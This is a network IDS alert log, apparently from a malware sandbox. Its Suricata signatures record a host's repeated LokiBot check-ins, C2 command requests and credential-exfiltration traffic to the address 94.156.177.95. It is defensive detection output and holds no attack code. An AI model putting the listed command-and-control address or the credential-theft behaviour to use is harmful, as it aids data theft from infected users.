                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49832 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49836 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49756
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49836
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49860 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49860 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49849 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49849 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49849 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49825 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49825 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49755
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49739 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49747
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49825 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49818 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49879 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49879 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49818 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49825 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49879 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49742
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49779
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49832 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49802 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49750
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49818 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49825 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49802 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49743
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49759
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49879 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49818 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49918 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49765
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49757
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49746
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49860 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49888 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49802 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49762
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49879 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49818 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49860 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49849 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49832 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49749
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49753
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49740 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49860 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49918 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49849 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49860
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49832 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49832 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49773
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49751
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49808 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49758
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49918 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49879
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49818
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49825
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49849
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49918 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49918 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49802 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49802 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49802
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49888 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49936 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49905 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49808 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49808 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49923 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50016 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50016 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49744
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50016 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49936 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49936 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49936 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49795 -> 94.156.177.95:80
